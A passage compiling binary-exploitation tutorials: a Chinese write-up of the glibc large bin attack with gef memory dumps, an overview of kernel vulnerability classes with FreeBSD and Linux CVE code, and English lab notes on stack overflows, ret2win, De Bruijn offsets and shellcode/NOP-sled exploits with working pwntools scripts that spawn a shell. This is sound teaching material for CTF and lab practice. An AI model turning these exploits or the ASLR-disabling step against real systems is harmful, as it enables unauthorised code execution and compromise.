    fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
    fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
}
$ gcc -g large_bin_attack.c
$ ./a.out 
The targets we want to rewrite on stack:
stack_var1 (0x7fffffffdeb0): 0
stack_var2 (0x7fffffffdeb8): 0

Now, we allocate the first chunk: 0x555555757000
Then, we allocate the second chunk(large chunk): 0x555555757130
Finally, we allocate the third chunk(large chunk): 0x555555757560

Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist

Now we use a vulnerability to overwrite the freed second chunk

Finally, we free the third chunk and malloc again, targets should have already been rewritten:
stack_var1 (0x7fffffffdeb0): 0x555555757560
stack_var2 (0x7fffffffdeb8): 0x555555757560

该技术可用于修改任意地址的值，例如栈上的变量 stack_var1 和 stack_var2。在实践中常常作为其他漏洞利用的前奏，例如在 fastbin attack 中用于修改全局变量 global_max_fast 为一个很大的值。

首先我们分配 chunk p1, p2 和 p3，并且在它们之间插入其他的 chunk 以防止在释放时被合并。此时的内存布局如下：

gef➤  x/2gx &stack_var1 
0x7fffffffde70:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx p1-2
0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1
0x555555757010:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p2-6
0x555555757110:    0x0000000000000000    0x0000000000000021
0x555555757120:    0x0000000000000000    0x0000000000000000
0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2
0x555555757140:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p3-6
0x555555757540:    0x0000000000000000    0x0000000000000021
0x555555757550:    0x0000000000000000    0x0000000000000000
0x555555757560:    0x0000000000000000    0x0000000000000411  <-- p3
0x555555757570:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p3+(0x410/8)-2
0x555555757970:    0x0000000000000000    0x0000000000000021
0x555555757980:    0x0000000000000000    0x0000000000000000
0x555555757990:    0x0000000000000000    0x0000000000020671  <-- top
0x5555557579a0:    0x0000000000000000    0x0000000000000000

然后依次释放掉 p1 和 p2，这两个 free chunk 将被放入 unsorted bin：

gef➤  x/8gx p1-2
0x555555757000:    0x0000000000000000    0x0000000000000111  <-- p1 [be freed]
0x555555757010:    0x00007ffff7dd3b78    0x0000555555757130
0x555555757020:    0x0000000000000000    0x0000000000000000
0x555555757030:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
0x555555757140:    0x0000555555757000    0x00007ffff7dd3b78
0x555555757150:    0x0000000000000000    0x0000000000000000
0x555555757160:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
 →   Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)   →   Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
[+] Found 2 chunks in unsorted bin.

接下来随便 malloc 一个 chunk，则 p1 被切分为两块，一块作为分配的 chunk 返回，剩下的一块继续留在 unsorted bin（p1 的作用就在这里，如果没有 p1，那么切分的将是 p2）。而 p2 则被整理回对应的 large bin 链表中：

gef➤  x/14gx p1-2
0x555555757000:    0x0000000000000000    0x0000000000000041  <-- p1-1
0x555555757010:    0x00007ffff7dd3c78    0x00007ffff7dd3c78
0x555555757020:    0x0000000000000000    0x0000000000000000
0x555555757030:    0x0000000000000000    0x0000000000000000
0x555555757040:    0x0000000000000000    0x00000000000000d1  <-- p1-2 [be freed]
0x555555757050:    0x00007ffff7dd3b78    0x00007ffff7dd3b78      <-- fd, bk
0x555555757060:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x0000000000000411  <-- p2 [be freed]
0x555555757140:    0x00007ffff7dd3f68    0x00007ffff7dd3f68      <-- fd, bk
0x555555757150:    0x0000555555757130    0x0000555555757130      <-- fd_nextsize, bk_nextsize
0x555555757160:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
 →   Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
gef➤  heap bins large
[ Large Bins for arena 'main_arena' ]
[+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
 →   Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
[+] Found 1 chunks in 1 large non-empty bins.

整理的过程如下所示，需要注意的是 large bins 中 chunk 按 fd 指针的顺序从大到小排列，如果大小相同则按照最近使用顺序排列：

          /* place chunk in bin */

          if (in_smallbin_range (size))
            {
                [ ... ]
            }
          else
            {
              victim_index = largebin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;

              /* maintain large bins in sorted order */
              if (fwd != bck)
                {
                  /* Or with inuse bit to speed comparisons */
                  size |= PREV_INUSE;
                  /* if smaller than smallest, bypass loop below */
                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
                    {
                        [ ... ]
                    }
                  else
                    {
                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
                      while ((unsigned long) size < fwd->size)
                        {
                            [ ... ]
                        }

                      if ((unsigned long) size == (unsigned long) fwd->size)
                        [ ... ]
                      else
                        {
                          victim->fd_nextsize = fwd;
                          victim->bk_nextsize = fwd->bk_nextsize;
                          fwd->bk_nextsize = victim;
                          victim->bk_nextsize->fd_nextsize = victim;
                        }
                      bck = fwd->bk;
                    }
                }
              else
                [ ... ]
            }

          mark_bin (av, victim_index);
          victim->bk = bck;
          victim->fd = fwd;
          fwd->bk = victim;
          bck->fd = victim;

假设我们有一个漏洞，可以对 large bin 里的 chunk p2 进行修改，结合上面的整理过程，我们伪造 p2 如下：

gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x00000000000003f1  <-- fake p2 [be freed]
0x555555757140:    0x0000000000000000    0x00007fffffffde60      <-- bk
0x555555757150:    0x0000000000000000    0x00007fffffffde58      <-- bk_nextsize
0x555555757160:    0x0000000000000000    0x0000000000000000

同样的，释放 p3，将其放入 unsorted bin，紧接着进行 malloc 操作，将 p3 整理回 large bin，这个过程中判断条件 (unsigned long) (size) < (unsigned long) (bck->bk->size) 为假，程序将进入 else 分支，其中 fwd 是 fake p2，victim 是 p3，接着 bck 被赋值为 (&stack_var1 - 2)。

在 p3 被放回 large bin 并排序的过程中，我们位于栈上的两个变量也被修改成了 victim，对应的语句分别是 bck->fd = victim; 和 ictim->bk_nextsize->fd_nextsize = victim;。

gef➤  x/2gx &stack_var1 
0x7fffffffde70:    0x0000555555757560    0x0000555555757560
gef➤  x/8gx p2-2
0x555555757130:    0x0000000000000000    0x00000000000003f1
0x555555757140:    0x0000000000000000    0x0000555555757560
0x555555757150:    0x0000000000000000    0x0000555555757560
0x555555757160:    0x0000000000000000    0x0000000000000000
gef➤  x/8gx p3-2
0x555555757560:    0x0000000000000000    0x0000000000000411
0x555555757570:    0x0000555555757130    0x00007fffffffde60
0x555555757580:    0x0000555555757130    0x00007fffffffde58
0x555555757590:    0x0000000000000000    0x0000000000000000

考虑 libc-2.26 上的情况，还是一样的，处理好 tchache 就可以了，在 free 之前把两种大小的 tcache bin 都占满。

3.1.11 Linux 内核漏洞利用

从用户态到内核态

企图	用户态漏洞利用	内核态漏洞利用
蛮力法利用漏洞	应用程序可以多次崩溃并重启（或自动重启）	这将导致机器陷入不一致的状态，通常会导致死机或重启
影响目标程序	攻击者对被攻击程序（特别是本地攻击）拥有更多的控制（例如攻击者可以设置被攻击程序的运行环境）。被攻击程序是它的库子系统的唯一使用者（例如内存分配表）	攻击者需要和其他所有欲“影响”内核的应用程序竞争。所有的应用程序都是内核子系统的使用者
执行 shellcode	shellcode 可以利用已经通过安全和正确性保证的用户态门来进行内核系统调用	shellcode 在更高的权限级别上执行，并且必须在不惊动系统的情况下正确地返回到应用程序
绕过反漏洞利用保护措施	这要求越来越复杂的方法	大部分保护措施在内核态，但并不能保护内核本身。攻击者甚至能禁用大部分保护措施

内核漏洞分类

未初始化的、未验证的、已损坏的指针解引用

这类漏洞涵盖了所有使用指针的情况，所指内容遭到破坏、没有被正确设置、或者是没有做足够的验证。

我们知道一个静态声明的指针被初始化为 NULL，但其他情况下这些指针被明确地赋值之前，都是未初始化的，它的值是存放指针处的内存里的任意内容。例如下面这样，指针被存放在栈上，而它的内容是之前函数留在栈上的 "A" 字符串：

#include <stdio.h>
#include <string.h>

void big_stack_usage() {
    char big[0x100];
    memset(big, 'A', 0x100);
    printf("Big stack: %p ~ %p\n", big, big+0x100);
}

void ptr_un_initialized() {
    char *p;
    printf("Pointer value: %p => %p\n", &p, p);
}

int main() {
    big_stack_usage();
    ptr_un_initialized();
}
$ gcc -fno-stack-protector pointer.c
$ ./a.out
Big stack: 0x7fffd6b0e400 ~ 0x7fffd6b0e500
Pointer value: 0x7fffd6b0e4f8 => 0x4141414141414141

下面看一个真实的例子，来自 FreeBSD8.0：

struct ucred ucred, *ucp;               // [1]
[...]
    refcount_init(&ucred.cr_ref, 1);
    ucred.cr_uid = ip->i_uid;
    ucred.cr_ngroups = 1;
    ucred.cr_groups[0] = dp->i_gid;     // [2]
    ucp = &ucred;

[1] 处的 ucred 在栈上进行了声明，然后 cr_groups[0] 被赋值为 dp->i_gid。遗憾的是，struct ucred 结构体的定义是这样的：

struct ucred {
    u_int   cr_ref;     /* reference count */
[...]
    gid_t   *cr_groups; /* groups */
    int     cr_agroups; /* Available groups */
};

我们看到 cr_groups 是一个指针，而且没有被初始化就直接使用。这也就意味着，dp->i_gid 的值在 ucred 被分配时被写入到栈上的任意地址。

继续看未经验证的指针，这往往发生在多用户的内核地址空间中。我们知道内核空间位于用户空间的上面，它的页表在所有进程的页表中都有备份。有些虚拟地址被选做限制地址，限定地址以上或以下的虚拟地址归内核使用，而其他的归用户空间使用。内核函数也就是使用这个限定地址来判断一个指针指向的是内核还是用户空间。如果是前者，则可能只需做少量的验证，但如果是后者，则要格外小心，否则一个用户空间的地址可能在不受控制的情况下被解引用。

看一个 Linux 的例子，CVE-2008-0009：

    error = get_user(base, &iov->iov_base);     // [1]
    [...]
    if (unlikely(!base)) {
        error = -EFAULT;
        break;
    }
    [...]
    sd.u.userptr = base;                        // [2]
    [...]
    size = __splice_from_pipe(pipe, &sd, pipe_to_user);
[...]
static int pipe_to_user(struct pipe_inode_info *pipe, struct pipe_buffer *buf, struct splice_desc *sd)
{
    if (!fault_in_pages_writeable(sd->u.userptr, sd->len)) {
        src = buf->ops->map(pipe, buf, 1);
        ret = __copy_to_user_inatomic(sd->u.userptr, src + buf->offset, sd->len);                               // [3]
        buf->ops->unmap(pipe, buf, src);
[...]
}

代码的第一部分来自函数 vmsplice_to_user()，在 [1] 处使用了 get_user() 获得了目的指针。该目的指针未经检查就默认它是一个用户地址指针，然后通过 [2] 传递给了 __splice_from_pipe()，同时传递函数 pipe_to_user 作为 helper function。这个函数依然是未经检查就调用了 __copy_to_user_inatomic()[3]，对该指针做解引用的操作，如果攻击者传递的是一个内核地址，则利用该漏洞能够写入任意数据到任意的内核内存中。这里要知道的还有 Linux 中以两个下划线开头的函数（例如 __copy_to_user_inatomic()）是不会对所提供的目的（或源）用户指针做任何检查的。

最后，一个被损坏的指针往往是其他漏洞的结果（例如缓冲区溢出），攻击者可以任意修改指针的内容，获得更多的控制权。

内存破坏漏洞

这类漏洞是由于程序的错误操作重写了内核空间的内存（包括内核栈和内核堆）导致的。

内核栈在每次进程进入到内核态时发挥作用。内核栈与用户栈基本相同，但也有一些细小的差别，例如它的大小通常是受限制的。另外，所有进程的内核栈都是一块相同的内核地址空间中的一部分，所以他们开始于不同的虚拟地址并且占据不同的虚拟地址空间。

由于内核栈与用户栈的相似性，其发生漏洞的地方也大体相同，例如使用不安全的函数（strcpy(), sprintf() 等），数组越界，缓冲区溢出等。

针对内核堆的漏洞往往是缓冲区溢出造成的。通过溢出，重写了溢出块后面的块，或者重写了缓存相关的元数据，都可能造成漏洞利用。

整数误用

整数溢出和符号转换错误是最常见的两种整数误用漏洞。这类漏洞往往不容易单独利用，但它可能会导致另外的一些漏洞（例如内存溢出）的发生。

整数溢出发生在将一个超出整数数据存储范围的数赋值给一个整数变量。在不加控制的加法和乘法运算中如果堆参见运算的参数不加验证，也有可能发生整数溢出。

符号转换错误发生在将一个无符号数当做有符号数处理的时候。一个经典的场景是，一个有符号数经过某个最大值检测后传入一个函数，而这个函数只接收无符号数。

看一个 FreeBSD V6.0 的例子：

int fw_ioctl (struct cdev *dev, u_long cmd, caddr_t data, int flag, fw_proc *td)
{
[...]
    int s, i, len, err = 0;                                     [1]
    [...]
    struct fw_crom_buf *crom_buf = (struct fw_crom_buf *)data;  [2]
    [...]
    if (fwdev == NULL) {
    [...]
        len = CROMSIZE;
    [...]
    } else {
    [...]
        if (fwdev->rommax < CSRROMOFF)
            len = 0;
        else
            len = fwdev->rommax - CSRROMOFF + 4;
    }
    if (crom_buf->len < len)                                    [3]
        len = crom_buf->len;
    else
        crom_buf->len = len;
    err = copyout(ptr, crom_buf->ptr, len);                     [4]
}

[1] 处的 len 是有符号整数，crom_buf->len 也是有符号数并且该值是我们可以控制的，如果它被设为一个负数，那么无论 len 的值是什么，[3] 处的条件都会满足。然后在 [4] 处，copyout() 被调用，该函数原型如下：

int copyout(const void *__restrict kaddr, void *__restrict udaddr, size_t len) __nonnull(1) __nonnull(2);

第三个参数的类型 size_t 是一个无符号整数，所以当 len 是一个负数的时候，会被认为是一个很大的正整数，造成任意内核内存读取。

更多内存可以参见章节 3.1.2。

竞态条件

如果有两个或两个以上执行者将要执行某一动作并且执行结果会由于它们执行顺序的不同而完全不同时，也就是发生了竞争条件。避免竞争条件的方法有很多，例如通过锁、信号量、条件变量等来保证各种行动者之间的同步性。竞争条件中最重要的一点是可竞争窗口的大小，它对于触发竞态条件的难易至关重要，由于这个原因，一些竞态条件的情况只能在对称多处理器（SMP）中被利用。

逻辑 bug

逻辑 bug 有很多种，下面介绍一个引用计数器溢出。我们知道共享资源都有一个引用计数，并在计数为零时释放掉资源，保持足够的内存空间。操作系统往往提供 get 和 put/drop 这样的函数来显式地增加和减少引用计数。

看一个 FreeBSD V5.0 的例子：

int fpathconf(td, uap)
    struct thread *td;
    register struct fpathconf_args *uap;
{
    struct file *fp;
    struct vnode *vp;
    int error;
    if ((error = fget(td, uap->fd, &fp)) != 0)      [1]
        return (error);
[...]
    switch (fp->f_type) {
    case DTYPE_PIPE:
    case DTYPE_SOCKET:
        if (uap->name != _PC_PIPE_BUF)
            return (EINVAL);                        [2]
        p->p_retval[0] = PIPE_BUF;
        error = 0;
        break;
[...]
out:
    fdrop(fp, td);                                  [3]
    return (error);
}

fpathconf() 系统调用用于获取一个特定的开放的文件描述符信息。所以该调用开头 [1] 处通过 fget() 获取该文件描述符结构的引用，然后在退出的时候 [3] 处通过 fdrop() 释放该引用。然而在 [2] 处的代码没有释放相关的引用计数就直接返回了。如果多次调用 fpathconf() 并触发 [2] 处的返回，则有可能导致引用计数器的溢出。

Binary Exploitation - Stack

https://ir0nstone.gitbook.io/notes/

Introduction

An Introduction to binary exploitation

Binary Exploitation is about finding vulnerabilities in programs and utilizing them to do what you wish. Sometimes this can result in an authentication bypass or the leaking of classified information, but occasionally (if you're lucky) it can also result in Remote Code Execution (RCE). The most basic forms of binary exploitation occur on the stack, a region of memory that stores temporary variables created by functions in code.

When a new function is called, a memory address in the calling function is pushed to the stack - this way, the program knows where to return to once the called function finishes execution. Let's look at a basic binary to show this.

introduction.zip

Analysis

The binary has two files - source.c and vuln; the latter is an ELF file, which is the executable format for Linux (it is recommended to follow along with this with a Virtual Machine of your own, preferably Linux).

We're gonna use a tool called radare2 to analyze the behavior of the binary when functions are called.

$ r2 -d -A vuln

The -d runs it while the -A performs the analysis. We can disassemble the main with

s main; pdf

s main seeks (moves) to main, while pdf stands for Print Disassembly Function (literally just disassembles it).

0x080491ab      55             push ebp
0x080491ac      89e5           mov ebp, esp
0x080491ae      83e4f0         and esp, 0xfffffff0
0x080491b1      e80d000000     call sym.__x86.get_pc_thunk.ax
0x080491b6      054a2e0000     add eax, 0x2e4a
0x080491bb      e8b2ffffff     call sym.unsafe
0x080491c0      90             nop
0x080491c1      c9             leave
0x080491c2      c3             ret

The call to unsafe is at 0x080491bb, so let's break there.

db 0x080491bb

db stands for debug breakpoint and just sets a breakpoint. A breakpoint is simply somewhere that pauses the program for you to run other commands when reached. Now we run dc for debug continue; this just carries on running the file.

It should break before unsafe is called; let's analyze the top of the stack now:

[0x08049172]> pxw @ esp
0xff984af0 0xf7efe000         [...]

The first address, 0xff984af0, is the position; the 0xf7efe000 is the value. Let's move one more instruction with the ds, debug step, and check the stack again.

[0x08049172]> pxw @ esp
0xff984aec  0x080491c0 0xf7efe000

Huh, something's been pushed onto the stack - the value 0x080491c0. This looks like it's in the binary - but where?

[...]
0x080491b6      054a2e0000     add eax, 0x2e4a
0x080491bb      e8b2ffffff     call sym.unsafe
0x080491c0      90             nop
[...]

Look at that - it's the instruction after the call to unsafe. Why? This is how the program knows where to return to after *unsafe()* has finished.

Weaknesses

But as we're interested in binary exploitation, let's see how we can possibly break this. First, let's disassemble unsafe and break on the ret instruction; ret is the equivalent of pop eip, which will get the saved return pointer we just analyzed on the stack into the eip register. Then let's continue and spam a bunch of characters into the input and see how that could affect it.

[0x08049172]> db 0x080491aa
[0x08049172]> dc
Overflow me
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now let's read the value at the location the return pointer was at previously, which as we saw was 0xff984aec.

[0x080491aa]> pxw @ 0xff984aec
0xff984aec  0x41414141 0x41414141 0x41414141 0x41414141  AAAAAAAAAAAAAAAA

Huh?

It's quite simple - we inputted more data than the program expected, which resulted in us overwriting more of the stack than the developer expected. The saved return pointer is also on the stack, meaning we managed to overwrite it. As a result, on the ret, the value popped into eip won't be in the previous function but rather 0x41414141. Let's check with ds.

[0x080491aa]> ds
[0x41414141]>

And look at the new prompt - 0x41414141. Let's run dr eip to make sure that's the value in eip:

[0x41414141]> dr eip
0x41414141

Yup, it is! We've successfully hijacked the program execution! Let's see if it crashes when we let it run with dc.

[0x41414141]> dc
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41414141 code=1 ret=0

radare2 is very useful and prints out the address that causes it to crash. If you cause the program to crash outside of a debugger, it will usually say Segmentation Fault, which could mean a variety of things, but usually that you have overwritten EIP.

Of course, you can prevent people from writing more characters than expected when making your program, usually using other C functions such as fgets(); gets() is intrinsically unsafe because it doesn't check the length of the input, meaning that the presence of gets() is always something you should check out in a program. It is also possible to give fgets() the wrong parameters, meaning it still takes in too many characters.

Summary

When a function calls another function, it

pushes a return pointer to the stack so the called function knows where to return
when the called function finishes execution, it pops it off the stack again

Because this value is saved on the stack, just like our local variables, if we write more characters than the program expects, we can overwrite the value and redirect code execution to wherever we wish. Functions such as fgets() can prevent such easy overflow, but you should check how much is actually being read.

ret2win

The most basic binexp challenge

A ret2win is simply a binary where there is a win() function (or equivalent); once you successfully redirect execution there, you complete the challenge.

To carry this out, we have to leverage what we learned in the introduction, but in a predictable manner - we have to overwrite EIP, but to a specific value of our choice.

To do this, what do we need to know? Well, a couple of things:

The padding until we begin to overwrite the return pointer (EIP)
What value do we want to overwrite EIP to

When I say "overwrite EIP", I mean overwrite the saved return pointer that gets popped into EIP. The EIP register is not located on the stack, so it is not overwritten directly.

ret2win.zip

Finding the Padding

This can be found using simple trial and error; if we send a variable number of characters, we can use the Segmentation Fault message, in combination with radare2, to tell when we overwrote EIP. There is a better way to do it than simple brute force (we'll cover this in the next post), but it'll do for now.

You may get a segmentation fault for reasons other than overwriting EIP; use a debugger to make sure the padding is correct.

We get an offset of 52 bytes.

Finding the Address

Now we need to find the address of the flag() function in the binary. This is simple.

$ r2 -d -A vuln
$ afl
[...]
0x080491c3    1 43           sym.flag
[...]

afl stands for Analyse Functions List

The flag() function is at 0x080491c3.

Using the Information

The final piece of the puzzle is to work out how we can send the address we want. If you think back to the introduction, the As that we sent became 0x41 - which is the ASCII code of A. So the solution is simple - let's just find the characters with ASCII codes 0x08, 0x04, 0x91, and 0xc3.

This is a lot simpler than you might think because we can specify them in Python as hex:

address = '\x08\x04\x91\xc3'

And that makes it much easier.

Putting it Together

Now we know the padding and the value, let's exploit the binary! We can use pwntools to interface with the binary (check out the pwntools posts for a more in-depth look).

from pwn import *        # This is how we import pwntools

p = process('./vuln')    # We're starting a new process

payload = 'A' * 52
payload += '\x08\x04\x91\xc3'

p.clean()                # Receive all the text

p.sendline(payload)

log.info(p.clean())      # Output the "Exploited!" string to know we succeeded

If you run this, there is one small problem: it won't work. Why? Let's check with a debugger. We'll put a pause() to give us time to attach radare2 to the process.

from pwn import *

p = process('./vuln')

payload = b'A' * 52
payload += '\x08\x04\x91\xc3'

log.info(p.clean())

pause()        # add this in

p.sendline(payload)

log.info(p.clean())

Now let's run the script with python3 exploit.py and then open up a new terminal window.

r2 -d -A $(pidof vuln)

By providing the PID of the process, radare2 hooks onto it. Let's break at the return of unsafe() and read the value of the return pointer.

[0x08049172]> db 0x080491aa
[0x08049172]> dc

<< press any button on the exploit terminal window >>

hit breakpoint at: 80491aa
[0x080491aa]> pxw @ esp
0xffdb0f7c  0xc3910408 [...]
[...]

0xc3910408 - look familiar? It's the address we were trying to send over, except the bytes have been reversed, and the reason for this reversal is endianness. Big-endian systems store the most significant byte (the byte with the largest value) at the smallest memory address, and this is how we sent them. Little-endian does the opposite (for a reason), and most binaries you will come across are little-endian. As far as we're concerned, the byte is stored in reverse order in little-endian executables.

Finding the Endianness

radare2 comes with a nice tool called rabin2 for binary analysis:

$ rabin2 -I vuln
[...]
endian   little
[...]

So our binary is little-endian.

Accounting for Endianness

The fix is simple - reverse the address (you can also remove the pause())

payload += '\x08\x04\x91\xc3'[::-1]

If you run this now, it will work:

$ python3 tutorial.py 
[+] Starting local process './vuln': pid 2290
[*] Overflow me
[*] Exploited!!!!!

And wham, you've called the flag() function! Congrats!

Pwntools and Endianness

Unsurprisingly, you're not the first person to have thought "Could they possibly make endianness simpler" - luckily, pwntools has a built-in p32() function ready for use!

payload += '\x08\x04\x91\xc3'[::-1]

becomes

payload += p32(0x080491c3)

Much simpler, right?

The only caveat is that it returns bytes rather than a string, so you have to make the padding a byte string:

payload = b'A' * 52        # Notice the "b"

Otherwise, you will get a

TypeError: can only concatenate str (not "bytes") to str

Final Exploit

from pwn import *            # This is how we import pwntools

p = process('./vuln')        # We're starting a new process

payload = b'A' * 52
payload += p32(0x080491c3)   # Use pwntools to pack it

log.info(p.clean())          # Receive all the text
p.sendline(payload)

log.info(p.clean())          # Output the "Exploited!" string to know we succeeded

De Bruijn Sequences

The better way to calculate offsets

De Bruijn sequences of order n is simply a sequence where no string of n characters is repeated. This makes finding the offset until EIP much simpler - we can just pass in a De Bruijn sequence, get the value within EIP and find the one possible match within the sequence to calculate the offset. Let's do this on the ret2win binary.

Generating the Pattern

Again, radare2 comes with a nice command-line tool (called ragg2) that can generate it for us. Let's create a sequence of length 100.

$ ragg2 -P 100 -r
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

The -P specifies the length while -r tells it to show ascii bytes rather than hex pairs.

Using the Pattern

Now we have the pattern, let's just input it in radare2 when prompted for input, make it crash, and then calculate how far along the sequence the EIP is. Simples.

$ r2 -d -A vuln

[0xf7ede0b0]> dc
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
child stopped with signal 11
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 ret=0

The address it crashes on is 0x41534141; we can use radare2's in-built wopO command to work out the offset.

[0x41534141]> wopO 0x41534141
52

Awesome - we get the correct value!

We can also be lazy and not copy the value.

[0x41534141]> wopO `dr eip`
52

The backticks mean the dr eip is calculated first before the wopO is run on the result of it.

Shellcode

Running your own code

In real exploits, it's not particularly likely that you will have a win() function lying around - shellcode is a way to run your own instructions, giving you the ability to run arbitrary commands on the system.

Shellcode is essentially assembly instructions, except we input them into the binary; once we input it, we overwrite the return pointer to hijack code execution and point at our own instructions!

I promise you can trust me but you should never ever run shellcode without knowing what it does. Pwntools is safe and has almost all the shellcode you will ever need.

The reason shellcode is successful is that Von Neumann architecture (the architecture used in most computers today) does not differentiate between data and instructions - it doesn't matter where or what you tell it to run, it will attempt to run it. Therefore, even though our input is data, the computer doesn't know that - and we can use that to our advantage.

shellcode.zip

Disabling ASLR

ASLR is a security technique, and while it is not specifically designed to combat shellcode, it involves randomizing certain aspects of memory (we will talk about it in much more detail later). This randomization can make shellcode exploits like the one we're about to do less reliable, so we'll be disabling it, for now, using this.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Again, you should never run commands if you don't know what they do

Finding the Buffer in Memory

Let's debug vuln() using radare2 and work out where in memory the buffer starts; this is where we want to point the return pointer to.

$ r2 -d -A vuln

[0xf7fd40b0]> s sym.unsafe ; pdf
[...]
; var int32_t var_134h @ ebp-0x134
[...]

This value that gets printed out is a local variable - due to its size, it's fairly likely to be the buffer. Let's set a breakpoint just after gets() and find the exact address.

[0x08049172]> dc
Overflow me
<<Found me>>                    <== This was my input
hit breakpoint at: 80491a8
[0x080491a8]> px @ ebp - 0x134
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0xffffcfb4  3c3c 466f 756e 6420 6d65 3e3e 00d1 fcf7  <<Found me>>....

[...]

It appears to be at 0xffffcfd4; if we run the binary multiple times, it should remain where it is (if it doesn't, make sure ASLR is disabled!).

Finding the Padding

Now we need to calculate the padding until the return pointer. We'll use the De Bruijn sequence as explained in the previous blog post.

$ ragg2 -P 400 -r
<copy this>

$ r2 -d -A vuln
[0xf7fd40b0]> dc
Overflow me
<<paste here>>
[0x73424172]> wopO `dr eip`
312

The padding is 312 bytes.

Putting it all together

In order for the shellcode to be correct, we're going to set the context.binary to our binary; this grabs stuff like the arch, OS, and bits and enables pwntools to provide us with working shellcode.

from pwn import *

context.binary = ELF('./vuln')

p = process()

We can use just process() because once the context.binary is set it is assumed to use that process

Now we can use pwntools' awesome shellcode functionality to make it incredibly simple.

payload = asm(shellcraft.sh())          # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4)              # Address of the Shellcode

Yup, that's it. Now let's send it off and use p.interactive(), which enables us to communicate to the shell.

log.info(p.clean())

p.sendline(payload)

p.interactive()

If you're getting an EOFError, print out the shellcode and try to find it in memory - the stack address may be wrong

$ python3 exploit.py
[*] 'vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Starting local process 'vuln': pid 3606
[*] Overflow me
[*] Switching to interactive mode
$ whoami
ironstone
$ ls
exploit.py  source.c  vuln

And it works! Awesome.

Final Exploit

from pwn import *

context.binary = ELF('./vuln')

p = process()

payload = asm(shellcraft.sh())          # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4)              # Address of the Shellcode

log.info(p.clean())

p.sendline(payload)

p.interactive()

Summary

We injected shellcode, a series of assembly instructions, when prompted for input
We then hijacked code execution by overwriting the saved return pointer on the stack and modified it to point to our shellcode
Once the return pointer got popped into EIP, it pointed at our shellcode
This caused the program to execute our instructions, giving us (in this case) a shell for arbitrary command execution

NOPs

More reliable shellcode exploits

NOP (no operation) instructions do exactly what they sound like nothing. This makes them very useful for shellcode exploits because all they will do is run the next instruction. If we pad our exploits on the left with NOPs and point EIP in the middle of them, it'll simply keep doing no instructions until it reaches our actual shellcode. This allows us a greater margin of error as a shift of a few bytes forward or backward won't really affect it, it'll just run a different number of NOP instructions - which have the same end result of running the shellcode. This padding with NOPs is often called a NOP slide or NOP sled since the EIP is essentially sliding down them.

In intel x86 assembly, NOP instructions are \x90.

The NOP instruction actually used to stand for XCHG EAX, EAX, which does effectively nothing. You can read a bit more about it on this StackOverflow question.

Updating our Shellcode Exploit

We can make slight changes to our exploit to do two things:

Add a large number of NOPs on the left
Adjust our return pointer to point at the middle of the NOPs rather than the buffer start

Make sure ASLR is still disabled. If you have to disable it again, you may have to readjust your previous exploit as the buffer location may be different.

from pwn import *

context.binary = ELF('./vuln')

p = process()

payload = b'\x90' * 240                 # The NOPs
payload += asm(shellcraft.sh())         # The shellcode
payload = payload.ljust(312, b'A')      # Padding
payload += p32(0xffffcfb4 + 120)        # Address of the buffer + half nop length

log.info(p.clean())

p.sendline(payload)

p.interactive()

It's probably worth mentioning that shellcode with NOPs is not failsafe; if you receive unexpected errors padding with NOPs but the shellcode worked before, try reducing the length of the nopsled as it may be tampering with other things on the stack

Note that NOPs are only \x90 in certain architectures, and if you need others you can use pwntools:

nop = asm(shellcraft.nop())

32- vs 64-bit

The differences between the sizes

Everything we have done so far is applicable to 64-bit as well as 32-bit; the only thing you would need to change is switching out the p32() for p64() as the memory addresses are longer.

